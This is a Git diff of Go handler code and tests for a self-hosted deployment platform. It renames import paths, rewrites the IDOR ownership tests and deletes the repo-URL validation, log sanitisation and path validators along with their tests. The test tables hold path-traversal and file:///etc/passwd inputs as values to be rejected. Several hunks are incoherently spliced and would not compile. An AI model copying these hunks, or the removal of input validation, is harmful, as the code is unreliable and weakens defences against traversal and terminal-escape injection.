+	"git.eeqj.de/sneak/upaas/internal/service/auth"
-	"sneak.berlin/go/upaas/internal/service/auth"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
-	"sneak.berlin/go/upaas/internal/service/deploy"
+	"git.eeqj.de/sneak/upaas/internal/service/notify"
-	"sneak.berlin/go/upaas/internal/service/notify"
+	"git.eeqj.de/sneak/upaas/internal/service/webhook"
 	"sneak.berlin/go/upaas/internal/service/webhook"
 )
 type testContext struct {
@@ -37,7 +36,6 @@ type testContext struct {
 	database *database.Database
 	authSvc  *auth.Service
 	appSvc   *app.Service
 	middleware *middleware.Middleware
 }
 func createTestConfig(t *testing.T) *config.Config {
@@ -168,20 +166,11 @@ func setupTestHandlers(t *testing.T) *testContext {
 	)
 	require.NoError(t, handlerErr)
 	mw, mwErr := middleware.New(fx.Lifecycle(nil), middleware.Params{
 		Logger:  logInstance,
 		Globals: globalInstance,
 		Config:  cfg,
 		Auth:    authSvc,
 	})
 	require.NoError(t, mwErr)
 	return &testContext{
 		handlers: handlersInstance,
 		database: dbInstance,
 		authSvc:  authSvc,
 		appSvc:   appSvc,
 		middleware: mw,
 	}
 }
@@ -404,25 +393,6 @@ func TestHandleDashboard(t *testing.T) {
 		assert.Equal(t, http.StatusOK, recorder.Code)
 		assert.Contains(t, recorder.Body.String(), "Applications")
 	})
 	t.Run("renders dashboard with apps without crashing on CSRFField", func(t *testing.T) {
 		t.Parallel()
 		testCtx := setupTestHandlers(t)
 		// Create an app so the template iterates over AppStats and hits .CSRFField
 		createTestApp(t, testCtx, "csrf-test-app")
 		request := httptest.NewRequest(http.MethodGet, "/", nil)
 		recorder := httptest.NewRecorder()
 		handler := testCtx.handlers.HandleDashboard()
 		handler.ServeHTTP(recorder, request)
 		assert.Equal(t, http.StatusOK, recorder.Code,
 			"dashboard should not 500 when apps exist (CSRFField must be accessible)")
 		assert.Contains(t, recorder.Body.String(), "csrf-test-app")
 	})
 }
 func TestHandleAppNew(t *testing.T) {
@@ -480,156 +450,85 @@ func createTestApp(
 	return createdApp
 }
 // TestHandleWebhookRejectsOversizedBody tests that oversized webhook payloads
 // are handled gracefully.
 func TestHandleWebhookRejectsOversizedBody(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	// Create an app first
 	createdApp, createErr := testCtx.appSvc.CreateApp(
 		context.Background(),
 		app.CreateAppInput{
 			Name:    "oversize-test-app",
 			RepoURL: "git@example.com:user/repo.git",
 			Branch:  "main",
 		},
 	)
 	require.NoError(t, createErr)
 	// Create a body larger than 1MB - it should be silently truncated
 	// and the webhook should still process (or fail gracefully on parse)
 	largePayload := strings.Repeat("x", 2*1024*1024) // 2MB
 	request := httptest.NewRequest(
 		http.MethodPost,
 		"/webhook/"+createdApp.WebhookSecret,
 		strings.NewReader(largePayload),
 	)
 	request = addChiURLParams(
 		request,
 		map[string]string{"secret": createdApp.WebhookSecret},
 	)
 	request.Header.Set("Content-Type", "application/json")
 	request.Header.Set("X-Gitea-Event", "push")
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleWebhook()
 	handler.ServeHTTP(recorder, request)
 	// Should still return OK (payload is truncated and fails JSON parse,
 	// but webhook service handles invalid JSON gracefully)
 	assert.Equal(t, http.StatusOK, recorder.Code)
 }
 // ownedResourceTestConfig configures an IDOR ownership verification test.
 type ownedResourceTestConfig struct {
 	appPrefix1 string
 	appPrefix2 string
 	createFn   func(t *testing.T, tc *testContext, app *models.App) int64
 	deletePath func(appID string, resourceID int64) string
 	chiParams  func(appID string, resourceID int64) map[string]string
 	handler    func(h *handlers.Handlers) http.HandlerFunc
 	verifyFn   func(t *testing.T, tc *testContext, resourceID int64)
 }
 func testOwnershipVerification(t *testing.T, cfg ownedResourceTestConfig) {
 	t.Helper()
 	testCtx := setupTestHandlers(t)
 	app1 := createTestApp(t, testCtx, cfg.appPrefix1)
 	app2 := createTestApp(t, testCtx, cfg.appPrefix2)
 	resourceID := cfg.createFn(t, testCtx, app1)
 	request := httptest.NewRequest(
 		http.MethodPost,
 		cfg.deletePath(app2.ID, resourceID),
 		nil,
 	)
 	request = addChiURLParams(request, cfg.chiParams(app2.ID, resourceID))
 	recorder := httptest.NewRecorder()
 	handler := cfg.handler(testCtx.handlers)
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusNotFound, recorder.Code)
 	cfg.verifyFn(t, testCtx, resourceID)
 }
 // TestDeleteEnvVarOwnershipVerification tests that deleting an env var
 // via another app's URL path returns 404 (IDOR prevention).
-func TestDeleteEnvVarOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
+func TestDeleteEnvVarOwnershipVerification(t *testing.T) {
 	t.Parallel()
-	testOwnershipVerification(t, ownedResourceTestConfig{
+	testCtx := setupTestHandlers(t)
 		appPrefix1: "envvar-owner-app",
 		appPrefix2: "envvar-other-app",
 		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
 			t.Helper()
-			envVar := models.NewEnvVar(tc.database)
+	app1 := createTestApp(t, testCtx, "envvar-owner-app")
-			envVar.AppID = ownerApp.ID
+	app2 := createTestApp(t, testCtx, "envvar-other-app")
 	// Create env var belonging to app1
 	envVar := models.NewEnvVar(testCtx.database)
 	envVar.AppID = app1.ID
 	envVar.Key = "SECRET"
 	envVar.Value = "hunter2"
 	require.NoError(t, envVar.Save(context.Background()))
-			return envVar.ID
+	// Try to delete app1's env var using app2's URL path
-		},
+	request := httptest.NewRequest(
-		deletePath: func(appID string, resourceID int64) string {
+		http.MethodPost,
-			return "/apps/" + appID + "/env/" + strconv.FormatInt(resourceID, 10) + "/delete"
+		"/apps/"+app2.ID+"/env/"+strconv.FormatInt(envVar.ID, 10)+"/delete",
-		},
+		nil,
-		chiParams: func(appID string, resourceID int64) map[string]string {
+	)
-			return map[string]string{"id": appID, "varID": strconv.FormatInt(resourceID, 10)}
+	request = addChiURLParams(request, map[string]string{
-		},
+		"id":    app2.ID,
-		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleEnvVarDelete() },
+		"envID": strconv.FormatInt(envVar.ID, 10),
 		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
 			t.Helper()
 			found, findErr := models.FindEnvVar(context.Background(), tc.database, resourceID)
 			require.NoError(t, findErr)
 			assert.NotNil(t, found, "env var should still exist after IDOR attempt")
 		},
 	})
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleEnvVarDelete()
 	handler.ServeHTTP(recorder, request)
 	// Should return 404 because the env var doesn't belong to app2
 	assert.Equal(t, http.StatusNotFound, recorder.Code)
 	// Verify the env var was NOT deleted
 	found, err := models.FindEnvVar(context.Background(), testCtx.database, envVar.ID)
 	require.NoError(t, err)
 	assert.NotNil(t, found, "env var should still exist after IDOR attempt")
 }
 // TestDeleteLabelOwnershipVerification tests that deleting a label
 // via another app's URL path returns 404 (IDOR prevention).
-func TestDeleteLabelOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
+func TestDeleteLabelOwnershipVerification(t *testing.T) {
 	t.Parallel()
-	testOwnershipVerification(t, ownedResourceTestConfig{
+	testCtx := setupTestHandlers(t)
 		appPrefix1: "label-owner-app",
 		appPrefix2: "label-other-app",
 		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
 			t.Helper()
-			lbl := models.NewLabel(tc.database)
+	app1 := createTestApp(t, testCtx, "label-owner-app")
-			lbl.AppID = ownerApp.ID
+	app2 := createTestApp(t, testCtx, "label-other-app")
 			lbl.Key = "traefik.enable"
 			lbl.Value = "true"
 			require.NoError(t, lbl.Save(context.Background()))
-			return lbl.ID
+	// Create label belonging to app1
-		},
+	label := models.NewLabel(testCtx.database)
-		deletePath: func(appID string, resourceID int64) string {
+	label.AppID = app1.ID
-			return "/apps/" + appID + "/labels/" + strconv.FormatInt(resourceID, 10) + "/delete"
+	label.Key = "traefik.enable"
-		},
+	label.Value = "true"
-		chiParams: func(appID string, resourceID int64) map[string]string {
+	require.NoError(t, label.Save(context.Background()))
 			return map[string]string{"id": appID, "labelID": strconv.FormatInt(resourceID, 10)}
 		},
 		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleLabelDelete() },
 		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
 			t.Helper()
-			found, findErr := models.FindLabel(context.Background(), tc.database, resourceID)
+	// Try to delete app1's label using app2's URL path
-			require.NoError(t, findErr)
+	request := httptest.NewRequest(
-			assert.NotNil(t, found, "label should still exist after IDOR attempt")
+		http.MethodPost,
-		},
+		"/apps/"+app2.ID+"/labels/"+strconv.FormatInt(label.ID, 10)+"/delete",
 		nil,
 	)
 	request = addChiURLParams(request, map[string]string{
 		"id":      app2.ID,
 		"labelID": strconv.FormatInt(label.ID, 10),
 	})
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleLabelDelete()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusNotFound, recorder.Code)
 	// Verify the label was NOT deleted
 	found, err := models.FindLabel(context.Background(), testCtx.database, label.ID)
 	require.NoError(t, err)
 	assert.NotNil(t, found, "label should still exist after IDOR attempt")
 }
 // TestDeleteVolumeOwnershipVerification tests that deleting a volume
@@ -714,194 +613,6 @@ func TestDeletePortOwnershipVerification(t *testing.T) {
 	assert.NotNil(t, found, "port should still exist after IDOR attempt")
 }
 // TestHandleEnvVarDeleteUsesCorrectRouteParam verifies that HandleEnvVarDelete
 // reads the "varID" chi URL parameter (matching the route definition {varID}),
 // not a mismatched name like "envID".
 func TestHandleEnvVarDeleteUsesCorrectRouteParam(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	createdApp := createTestApp(t, testCtx, "envdelete-param-app")
 	envVar := models.NewEnvVar(testCtx.database)
 	envVar.AppID = createdApp.ID
 	envVar.Key = "DELETE_ME"
 	envVar.Value = "gone"
 	require.NoError(t, envVar.Save(context.Background()))
 	// Use chi router with the real route pattern to test param name
 	r := chi.NewRouter()
 	r.Post("/apps/{id}/env-vars/{varID}/delete", testCtx.handlers.HandleEnvVarDelete())
 	request := httptest.NewRequest(
 		http.MethodPost,
 		"/apps/"+createdApp.ID+"/env-vars/"+strconv.FormatInt(envVar.ID, 10)+"/delete",
 		nil,
 	)
 	recorder := httptest.NewRecorder()
 	r.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusSeeOther, recorder.Code)
 	// Verify the env var was actually deleted
 	found, findErr := models.FindEnvVar(context.Background(), testCtx.database, envVar.ID)
 	require.NoError(t, findErr)
 	assert.Nil(t, found, "env var should be deleted when using correct route param")
 }
 // TestHandleVolumeAddValidatesPaths verifies that HandleVolumeAdd validates
 // host and container paths (same as HandleVolumeEdit).
 func TestHandleVolumeAddValidatesPaths(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	createdApp := createTestApp(t, testCtx, "volume-validate-app")
 	tests := []struct {
 		name          string
 		hostPath      string
 		containerPath string
 		shouldCreate  bool
 	}{
 		{"relative host path rejected", "relative/path", "/container", false},
 		{"relative container path rejected", "/host", "relative/path", false},
 		{"unclean host path rejected", "/host/../etc", "/container", false},
 		{"valid paths accepted", "/host/data", "/container/data", true},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			form := url.Values{}
 			form.Set("host_path", tt.hostPath)
 			form.Set("container_path", tt.containerPath)
 			request := httptest.NewRequest(
 				http.MethodPost,
 				"/apps/"+createdApp.ID+"/volumes",
 				strings.NewReader(form.Encode()),
 			)
 			request.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 			request = addChiURLParams(request, map[string]string{"id": createdApp.ID})
 			recorder := httptest.NewRecorder()
 			handler := testCtx.handlers.HandleVolumeAdd()
 			handler.ServeHTTP(recorder, request)
 			assert.Equal(t, http.StatusSeeOther, recorder.Code)
 			// Check if volume was created by listing volumes
 			volumes, _ := createdApp.GetVolumes(context.Background())
 			found := false
 			for _, v := range volumes {
 				if v.HostPath == tt.hostPath && v.ContainerPath == tt.containerPath {
 					found = true
 					// Clean up for isolation
 					_ = v.Delete(context.Background())
 				}
 			}
 			if tt.shouldCreate {
 				assert.True(t, found, "volume should be created for valid paths")
 			} else {
 				assert.False(t, found, "volume should NOT be created for invalid paths")
 			}
 		})
 	}
 }
 // TestSetupRequiredExemptsHealthAndStaticAndAPI verifies that the SetupRequired
 // middleware allows /health, /s/*, and /api/* paths through even when setup is required.
 func TestSetupRequiredExemptsHealthAndStaticAndAPI(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	// No user created, so setup IS required
 	mw := testCtx.middleware.SetupRequired()
 	okHandler := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 		_, _ = w.Write([]byte("OK"))
 	})
 	wrapped := mw(okHandler)
 	exemptPaths := []string{"/health", "/s/style.css", "/s/js/app.js", "/api/v1/apps", "/api/v1/login"}
 	for _, path := range exemptPaths {
 		t.Run(path, func(t *testing.T) {
 			t.Parallel()
 			req := httptest.NewRequest(http.MethodGet, path, nil)
 			rr := httptest.NewRecorder()
 			wrapped.ServeHTTP(rr, req)
 			assert.Equal(t, http.StatusOK, rr.Code,
 				"path %s should be exempt from setup redirect", path)
 		})
 	}
 	// Non-exempt path should redirect to /setup
 	t.Run("non-exempt redirects", func(t *testing.T) {
 		t.Parallel()
 		req := httptest.NewRequest(http.MethodGet, "/", nil)
 		rr := httptest.NewRecorder()
 		wrapped.ServeHTTP(rr, req)
 		assert.Equal(t, http.StatusSeeOther, rr.Code)
 		assert.Equal(t, "/setup", rr.Header().Get("Location"))
 	})
 }
 func TestHandleCancelDeployRedirects(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	createdApp := createTestApp(t, testCtx, "cancel-deploy-app")
 	request := httptest.NewRequest(
 		http.MethodPost,
 		"/apps/"+createdApp.ID+"/deployments/cancel",
 		nil,
 	)
 	request = addChiURLParams(request, map[string]string{"id": createdApp.ID})
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleCancelDeploy()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusSeeOther, recorder.Code)
 	assert.Equal(t, "/apps/"+createdApp.ID, recorder.Header().Get("Location"))
 }
 func TestHandleCancelDeployReturns404ForUnknownApp(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	request := httptest.NewRequest(
 		http.MethodPost,
 		"/apps/nonexistent/deployments/cancel",
 		nil,
 	)
 	request = addChiURLParams(request, map[string]string{"id": "nonexistent"})
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleCancelDeploy()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusNotFound, recorder.Code)
 }
 func TestHandleWebhookReturns404ForUnknownSecret(t *testing.T) {
 	t.Parallel()
--- a/internal/handlers/port_validation_test.go
+++ b/internal/handlers/port_validation_test.go
@@ -1,39 +0,0 @@
 package handlers //nolint:testpackage // tests unexported parsePortValues function
 import "testing"
 func TestParsePortValues(t *testing.T) {
 	t.Parallel()
 	tests := []struct {
 		name      string
 		host      string
 		container string
 		wantHost  int
 		wantCont  int
 		wantValid bool
 	}{
 		{"valid ports", "8080", "80", 8080, 80, true},
 		{"port 1", "1", "1", 1, 1, true},
 		{"port 65535", "65535", "65535", 65535, 65535, true},
 		{"host port above 65535", "99999", "80", 0, 0, false},
 		{"container port above 65535", "80", "99999", 0, 0, false},
 		{"both ports above 65535", "70000", "70000", 0, 0, false},
 		{"zero port", "0", "80", 0, 0, false},
 		{"negative port", "-1", "80", 0, 0, false},
 		{"non-numeric", "abc", "80", 0, 0, false},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			host, cont, valid := parsePortValues(tt.host, tt.container)
 			if host != tt.wantHost || cont != tt.wantCont || valid != tt.wantValid {
 				t.Errorf("parsePortValues(%q, %q) = (%d, %d, %v), want (%d, %d, %v)",
 					tt.host, tt.container, host, cont, valid,
 					tt.wantHost, tt.wantCont, tt.wantValid)
 			}
 		})
 	}
 }
--- a/internal/handlers/render_template_test.go
+++ b/internal/handlers/render_template_test.go
@@ -1,73 +0,0 @@
 package handlers_test
 import (
 	"net/http"
 	"net/http/httptest"
 	"testing"
 	"github.com/stretchr/testify/assert"
 )
 // TestRenderTemplateBuffersOutput verifies that successful template rendering
 // produces a complete HTML response (not partial/corrupt).
 func TestRenderTemplateBuffersOutput(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	// The setup page is simple and has no DB dependencies
 	request := httptest.NewRequest(http.MethodGet, "/setup", nil)
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleSetupGET()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusOK, recorder.Code)
 	body := recorder.Body.String()
 	// A properly buffered response should contain the closing </html> tag,
 	// proving the full template was rendered before being sent.
 	assert.Contains(t, body, "</html>")
 	// Should NOT contain the error text that would be appended on failure
 	assert.NotContains(t, body, "Internal Server Error")
 }
 // TestDashboardRenderTemplateBuffersOutput verifies the dashboard handler
 // also uses buffered template rendering.
 func TestDashboardRenderTemplateBuffersOutput(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	request := httptest.NewRequest(http.MethodGet, "/", nil)
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleDashboard()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusOK, recorder.Code)
 	body := recorder.Body.String()
 	assert.Contains(t, body, "</html>")
 	assert.NotContains(t, body, "Internal Server Error")
 }
 // TestLoginRenderTemplateBuffersOutput verifies the login handler
 // uses buffered template rendering.
 func TestLoginRenderTemplateBuffersOutput(t *testing.T) {
 	t.Parallel()
 	testCtx := setupTestHandlers(t)
 	request := httptest.NewRequest(http.MethodGet, "/login", nil)
 	recorder := httptest.NewRecorder()
 	handler := testCtx.handlers.HandleLoginGET()
 	handler.ServeHTTP(recorder, request)
 	assert.Equal(t, http.StatusOK, recorder.Code)
 	body := recorder.Body.String()
 	assert.Contains(t, body, "</html>")
 	assert.NotContains(t, body, "Internal Server Error")
 }
--- a/internal/handlers/repo_url_validation.go
+++ b/internal/handlers/repo_url_validation.go
@@ -1,77 +0,0 @@
 package handlers
 import (
 	"errors"
 	"net/url"
 	"regexp"
 	"strings"
 )
 // Repo URL validation errors.
 var (
 	errRepoURLEmpty   = errors.New("repository URL must not be empty")
 	errRepoURLScheme  = errors.New("file:// URLs are not allowed for security reasons")
 	errRepoURLInvalid = errors.New("repository URL must use https://, http://, ssh://, git://, or git@host:path format")
 	errRepoURLNoHost  = errors.New("repository URL must include a host")
 	errRepoURLNoPath  = errors.New("repository URL must include a path")
 )
 // scpLikeRepoRe matches SCP-like git URLs: git@host:path (e.g. git@github.com:user/repo.git).
 // Only the "git" user is allowed, as that is the standard for SSH deploy keys.
 var scpLikeRepoRe = regexp.MustCompile(`^git@[a-zA-Z0-9._-]+:.+$`)
 // allowedRepoSchemes lists the URL schemes accepted for repository URLs.
 //
 //nolint:gochecknoglobals // package-level constant map parsed once
 var allowedRepoSchemes = map[string]bool{
 	"https": true,
 	"http":  true,
 	"ssh":   true,
 	"git":   true,
 }
 // validateRepoURL checks that the given repository URL is valid and uses an allowed scheme.
 func validateRepoURL(repoURL string) error {
 	if strings.TrimSpace(repoURL) == "" {
 		return errRepoURLEmpty
 	}
 	// Reject path traversal in any URL format
 	if strings.Contains(repoURL, "..") {
 		return errRepoURLInvalid
 	}
 	// Check for SCP-like git URLs first (git@host:path)
 	if scpLikeRepoRe.MatchString(repoURL) {
 		return nil
 	}
 	// Reject file:// explicitly
 	if strings.HasPrefix(strings.ToLower(repoURL), "file://") {
 		return errRepoURLScheme
 	}
 	return validateParsedRepoURL(repoURL)
 }
 // validateParsedRepoURL validates a standard URL-format repository URL.
 func validateParsedRepoURL(repoURL string) error {
 	parsed, err := url.Parse(repoURL)
 	if err != nil {
 		return errRepoURLInvalid
 	}
 	if !allowedRepoSchemes[strings.ToLower(parsed.Scheme)] {
 		return errRepoURLInvalid
 	}
 	if parsed.Host == "" {
 		return errRepoURLNoHost
 	}
 	if parsed.Path == "" || parsed.Path == "/" {
 		return errRepoURLNoPath
 	}
 	return nil
 }
--- a/internal/handlers/repo_url_validation_test.go
+++ b/internal/handlers/repo_url_validation_test.go
@@ -1,60 +0,0 @@
 package handlers_test
 import (
 	"testing"
 	"sneak.berlin/go/upaas/internal/handlers"
 )
 func TestValidateRepoURL(t *testing.T) {
 	t.Parallel()
 	tests := []struct {
 		name    string
 		url     string
 		wantErr bool
 	}{
 		// Valid URLs
 		{name: "https URL", url: "https://github.com/user/repo.git", wantErr: false},
 		{name: "http URL", url: "http://github.com/user/repo.git", wantErr: false},
 		{name: "ssh URL", url: "ssh://git@github.com/user/repo.git", wantErr: false},
 		{name: "git URL", url: "git://github.com/user/repo.git", wantErr: false},
 		{name: "SCP-like URL", url: "git@github.com:user/repo.git", wantErr: false},
 		{name: "SCP-like with dots", url: "git@git.example.com:org/repo.git", wantErr: false},
 		{name: "https without .git", url: "https://github.com/user/repo", wantErr: false},
 		{name: "https with port", url: "https://git.example.com:8443/user/repo.git", wantErr: false},
 		// Invalid URLs
 		{name: "empty string", url: "", wantErr: true},
 		{name: "whitespace only", url: "   ", wantErr: true},
 		{name: "file URL", url: "file:///etc/passwd", wantErr: true},
 		{name: "file URL uppercase", url: "FILE:///etc/passwd", wantErr: true},
 		{name: "bare path", url: "/some/local/path", wantErr: true},
 		{name: "relative path", url: "../repo", wantErr: true},
 		{name: "just a word", url: "notaurl", wantErr: true},
 		{name: "ftp URL", url: "ftp://example.com/repo.git", wantErr: true},
 		{name: "no host https", url: "https:///path", wantErr: true},
 		{name: "no path https", url: "https://github.com", wantErr: true},
 		{name: "no path https trailing slash", url: "https://github.com/", wantErr: true},
 		{name: "SCP-like non-git user", url: "root@github.com:user/repo.git", wantErr: true},
 		{name: "SCP-like arbitrary user", url: "admin@github.com:user/repo.git", wantErr: true},
 		{name: "path traversal SCP", url: "git@github.com:../../etc/passwd", wantErr: true},
 		{name: "path traversal https", url: "https://github.com/user/../../../etc/passwd", wantErr: true},
 		{name: "path traversal in middle", url: "https://github.com/user/repo/../secret", wantErr: true},
 	}
 	for _, tc := range tests {
 		t.Run(tc.name, func(t *testing.T) {
 			t.Parallel()
 			err := handlers.ValidateRepoURLForTest(tc.url)
 			if tc.wantErr && err == nil {
 				t.Errorf("ValidateRepoURLForTest(%q) = nil, want error", tc.url)
 			}
 			if !tc.wantErr && err != nil {
 				t.Errorf("ValidateRepoURLForTest(%q) = %v, want nil", tc.url, err)
 			}
 		})
 	}
 }
--- a/internal/handlers/sanitize.go
+++ b/internal/handlers/sanitize.go
@@ -1,30 +0,0 @@
 package handlers
 import (
 	"regexp"
 	"strings"
 )
 // ansiEscapePattern matches ANSI escape sequences (CSI, OSC, and single-character escapes).
 var ansiEscapePattern = regexp.MustCompile(`(\x1b\[[0-9;]*[a-zA-Z]|\x1b\][^\x07]*\x07|\x1b[^[\]])`)
 // SanitizeLogs strips ANSI escape sequences and non-printable control characters
 // from container log output. Newlines (\n), carriage returns (\r), and tabs (\t)
 // are preserved. This ensures that attacker-controlled container output cannot
 // inject terminal escape sequences or other dangerous control characters.
 func SanitizeLogs(input string) string {
 	// Strip ANSI escape sequences
 	result := ansiEscapePattern.ReplaceAllString(input, "")
 	// Strip remaining non-printable characters (keep \n, \r, \t)
 	var b strings.Builder
 	b.Grow(len(result))
 	for _, r := range result {
 		if r == '\n' || r == '\r' || r == '\t' || r >= ' ' {
 			b.WriteRune(r)
 		}
 	}
 	return b.String()
 }
--- a/internal/handlers/sanitize_test.go
+++ b/internal/handlers/sanitize_test.go
@@ -1,84 +0,0 @@
 package handlers_test
 import (
 	"testing"
 	"sneak.berlin/go/upaas/internal/handlers"
 )
 func TestSanitizeLogs(t *testing.T) { //nolint:funlen // table-driven tests
 	t.Parallel()
 	tests := []struct {
 		name     string
 		input    string
 		expected string
 	}{
 		{
 			name:     "plain text unchanged",
 			input:    "hello world\n",
 			expected: "hello world\n",
 		},
 		{
 			name:     "strips ANSI color codes",
 			input:    "\x1b[31mERROR\x1b[0m: something failed\n",
 			expected: "ERROR: something failed\n",
 		},
 		{
 			name:     "strips OSC sequences",
 			input:    "\x1b]0;window title\x07normal text\n",
 			expected: "normal text\n",
 		},
 		{
 			name:     "strips null bytes",
 			input:    "hello\x00world\n",
 			expected: "helloworld\n",
 		},
 		{
 			name:     "strips bell characters",
 			input:    "alert\x07here\n",
 			expected: "alerthere\n",
 		},
 		{
 			name:     "preserves tabs",
 			input:    "field1\tfield2\tfield3\n",
 			expected: "field1\tfield2\tfield3\n",
 		},
 		{
 			name:     "preserves carriage returns",
 			input:    "line1\r\nline2\r\n",
 			expected: "line1\r\nline2\r\n",
 		},
 		{
 			name:     "strips mixed escape sequences",
 			input:    "\x1b[32m2024-01-01\x1b[0m \x1b[1mINFO\x1b[0m starting\x00\n",
 			expected: "2024-01-01 INFO starting\n",
 		},
 		{
 			name:     "empty string",
 			input:    "",
 			expected: "",
 		},
 		{
 			name:     "only control characters",
 			input:    "\x00\x01\x02\x03",
 			expected: "",
 		},
 		{
 			name:     "cursor movement sequences stripped",
 			input:    "\x1b[2J\x1b[H\x1b[3Atext\n",
 			expected: "text\n",
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			got := handlers.SanitizeLogs(tt.input)
 			if got != tt.expected {
 				t.Errorf("SanitizeLogs(%q) = %q, want %q", tt.input, got, tt.expected)
 			}
 		})
 	}
 }
--- a/internal/handlers/setup.go
+++ b/internal/handlers/setup.go
@@ -3,7 +3,7 @@ package handlers
 import (
 	"net/http"
-	"sneak.berlin/go/upaas/templates"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 const (
@@ -15,10 +15,14 @@ const (
 func (h *Handlers) HandleSetupGET() http.HandlerFunc {
 	tmpl := templates.GetParsed()
-	return func(writer http.ResponseWriter, request *http.Request) {
+	return func(writer http.ResponseWriter, _ *http.Request) {
-		data := h.addGlobals(map[string]any{}, request)
+		data := h.addGlobals(map[string]any{})
-		h.renderTemplate(writer, tmpl, "setup.html", data)
+		err := tmpl.ExecuteTemplate(writer, "setup.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
@@ -50,15 +54,14 @@ func validateSetupForm(formData setupFormData) string {
 func (h *Handlers) renderSetupError(
 	tmpl *templates.TemplateExecutor,
 	writer http.ResponseWriter,
 	request *http.Request,
 	username string,
 	errorMsg string,
 ) {
 	data := h.addGlobals(map[string]any{
 		"Username": username,
 		"Error":    errorMsg,
-	}, request)
+	})
-	h.renderTemplate(writer, tmpl, "setup.html", data)
+	_ = tmpl.ExecuteTemplate(writer, "setup.html", data)
 }
 // HandleSetupPOST handles the setup form submission.
@@ -80,7 +83,7 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 		}
 		if validationErr := validateSetupForm(formData); validationErr != "" {
-			h.renderSetupError(tmpl, writer, request, formData.username, validationErr)
+			h.renderSetupError(tmpl, writer, formData.username, validationErr)
 			return
 		}
@@ -92,7 +95,7 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 		)
 		if createErr != nil {
 			h.log.Error("failed to create user", "error", createErr)
-			h.renderSetupError(tmpl, writer, request, formData.username, "Failed to create user")
+			h.renderSetupError(tmpl, writer, formData.username, "Failed to create user")
 			return
 		}
@@ -103,7 +106,6 @@ func (h *Handlers) HandleSetupPOST() http.HandlerFunc {
 			h.renderSetupError(
 				tmpl,
 				writer,
 				request,
 				formData.username,
 				"Failed to create session",
 			)
--- a/internal/handlers/tail_validation_test.go
+++ b/internal/handlers/tail_validation_test.go
@@ -1,40 +0,0 @@
 package handlers_test
 import (
 	"testing"
 	"sneak.berlin/go/upaas/internal/handlers"
 )
 func TestSanitizeTail(t *testing.T) {
 	t.Parallel()
 	tests := []struct {
 		name     string
 		input    string
 		expected string
 	}{
 		{"empty uses default", "", handlers.DefaultLogTail},
 		{"valid small number", "50", "50"},
 		{"valid max boundary", "500", "500"},
 		{"exceeds max clamped", "501", "500"},
 		{"very large clamped", "999999", "500"},
 		{"non-numeric uses default", "abc", handlers.DefaultLogTail},
 		{"all keyword uses default", "all", handlers.DefaultLogTail},
 		{"negative uses default", "-1", handlers.DefaultLogTail},
 		{"zero uses default", "0", handlers.DefaultLogTail},
 		{"float uses default", "1.5", handlers.DefaultLogTail},
 		{"one is valid", "1", "1"},
 	}
 	for _, tc := range tests {
 		t.Run(tc.name, func(t *testing.T) {
 			t.Parallel()
 			got := handlers.SanitizeTail(tc.input)
 			if got != tc.expected {
 				t.Errorf("sanitizeTail(%q) = %q, want %q", tc.input, got, tc.expected)
 			}
 		})
 	}
 }
--- a/internal/handlers/volume_validation_test.go
+++ b/internal/handlers/volume_validation_test.go
@@ -1,34 +0,0 @@
 package handlers //nolint:testpackage // tests exported ValidateVolumePath function
 import "testing"
 func TestValidateVolumePath(t *testing.T) {
 	t.Parallel()
 	tests := []struct {
 		name    string
 		path    string
 		wantErr bool
 	}{
 		{"valid absolute path", "/data/myapp", false},
 		{"root path", "/", false},
 		{"empty path", "", true},
 		{"relative path", "data/myapp", true},
 		{"path with dotdot", "/data/../etc", true},
 		{"path with trailing slash", "/data/", true},
 		{"path with double slash", "/data//myapp", true},
 		{"single dot path", ".", true},
 	}
 	for _, tt := range tests {
